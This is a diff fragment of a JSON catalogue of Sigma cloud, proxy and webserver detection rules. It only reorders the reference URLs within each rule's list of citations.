+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml"
 ],
 "tags": [
@@ -69743,8 +69743,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml"
 ],
 "tags": [
@@ -69769,8 +69769,8 @@
 "logsource.category": "No established category",
 "logsource.product": "okta",
 "refs": [
- "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/",
+ "https://developer.okta.com/docs/reference/api/system-log/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml"
 ],
 "tags": [
@@ -69793,8 +69793,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml"
 ],
 "tags": [
@@ -69827,8 +69827,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml"
 ],
 "tags": [
@@ -69861,8 +69861,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml"
 ],
 "tags": [
@@ -69895,8 +69895,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml"
 ],
 "tags": [
@@ -69929,8 +69929,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml"
 ],
 "tags": [
@@ -69953,11 +69953,11 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
- "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
 "https://o365blog.com/post/aadbackdoor/",
- "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf",
 "https://www.sygnia.co/golden-saml-advisory",
+ "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html",
+ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml"
 ],
 "tags": [
@@ -69990,8 +69990,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml"
 ],
 "tags": [
@@ -70048,8 +70048,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml"
 ],
 "tags": [
@@ -70082,8 +70082,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml"
 ],
 "tags": [
@@ -70116,8 +70116,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml"
 ],
 "tags": [
@@ -70140,8 +70140,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml"
 ],
 "tags": [
@@ -70165,8 +70165,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml"
 ],
 "tags": [
@@ -70232,8 +70232,8 @@
 "logsource.category": "No established category",
 "logsource.product": "m365",
 "refs": [
- "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference",
+ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml"
 ],
 "tags": [
@@ -70365,9 +70365,9 @@
 "refs": [
 "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
 "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole",
+ "https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
 "https://github.com/elastic/detection-rules/pull/1267",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
- "https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml"
 ],
 "tags": [
@@ -70415,8 +70415,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://cloud.google.com/kubernetes-engine/docs",
 "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
+ "https://cloud.google.com/kubernetes-engine/docs",
 "https://kubernetes.io/docs/concepts/workloads/controllers/job/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml"
 ],
@@ -70468,8 +70468,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
 "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html",
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml"
 ],
 "tags": [
@@ -70638,8 +70638,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
 "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
+ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml"
 ],
 "tags": [
@@ -70672,9 +70672,9 @@
 "logsource.category": "No established category",
 "logsource.product": "google_workspace",
 "refs": [
+ "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
 "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST",
 "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
- "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml"
 ],
 "tags": [
@@ -70697,8 +70697,8 @@
 "logsource.category": "No established category",
 "logsource.product": "google_workspace",
 "refs": [
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE",
 "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml"
 ],
 "tags": [
@@ -70731,8 +70731,8 @@
 "logsource.category": "No established category",
 "logsource.product": "google_workspace",
 "refs": [
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings",
 "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml"
 ],
 "tags": [
@@ -70755,8 +70755,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" ], "tags": [ @@ -70779,9 +70779,9 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" ], "tags": [ @@ -70804,8 +70804,8 @@ "logsource.category": "No established category", "logsource.product": "google_workspace", "refs": [ - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" ], "tags": [ 
@@ -70885,12 +70885,12 @@ "logsource.product": "aws", "refs": [ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], "tags": [ @@ -71033,8 +71033,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" ], "tags": [ 
@@ -71429,8 +71429,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" ], "tags": [ @@ -71616,9 +71616,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", - "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" ], "tags": [ @@ -71757,8 +71757,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" ], "tags": [ 
@@ -71849,9 +71849,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ @@ -71989,8 +71989,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ @@ -72843,8 +72843,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" ], "tags": [ 
@@ -73064,11 +73064,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" ], "tags": [ @@ -74003,11 +74003,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" ], "tags": [ 
@@ -74065,11 +74065,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" ], "tags": [ @@ -74211,11 +74211,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" ], "tags": [ 
@@ -74271,8 +74271,8 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" ], "tags": [ @@ -74340,9 +74340,9 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" ], 
@@ -74426,11 +74426,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" ], "tags": [ @@ -74991,11 +74991,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" ], "tags": [ 
@@ -75020,11 +75020,11 @@ "logsource.category": "No established category", "logsource.product": "azure", "refs": [ + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", "https://attack.mitre.org/matrices/enterprise/cloud/", "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" ], "tags": [ @@ -75157,8 +75157,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", "https://twitter.com/jhencinski/status/1102695118455349248", + "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml" ], "tags": [ @@ -75270,9 +75270,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", "https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_poc_exploitation.yml" ], "tags": [ 
@@ -75482,9 +75482,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml" ], "tags": [ @@ -75569,10 +75569,10 @@ "logsource.product": "No established product", "refs": [ "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://perishablepress.com/blacklist/ua-2013.txt", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml" ], "tags": [ @@ -75648,8 +75648,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://rclone.org/", "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://rclone.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_rclone.yml" ], "tags": [ 
@@ -75682,8 +75682,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/", + "https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_exchange_owassrf_exploitation.yml" ], "tags": [ @@ -75915,8 +75915,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.advanced-port-scanner.com/", "https://www.advanced-ip-scanner.com/", + "https://www.advanced-port-scanner.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml" ], "tags": [ @@ -75949,10 +75949,10 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", - "https://www.spamhaus.org/statistics/tlds/", - "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", + "https://www.spamhaus.org/statistics/tlds/", + "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml" ], "tags": [ 
@@ -76463,8 +76463,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://bad-jubies.github.io/RCE-NOW-WHAT/", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://bad-jubies.github.io/RCE-NOW-WHAT/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_win_webshells_in_access_logs.yml" ], "tags": [ @@ -76488,9 +76488,9 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://twitter.com/jas502n/status/1321416053050667009?s=20", "https://twitter.com/sudo_sudoka/status/1323951871078223874", "https://isc.sans.edu/diary/26734", - "https://twitter.com/jas502n/status/1321416053050667009?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" ], "tags": [ @@ -76524,10 +76524,10 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md", - "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", 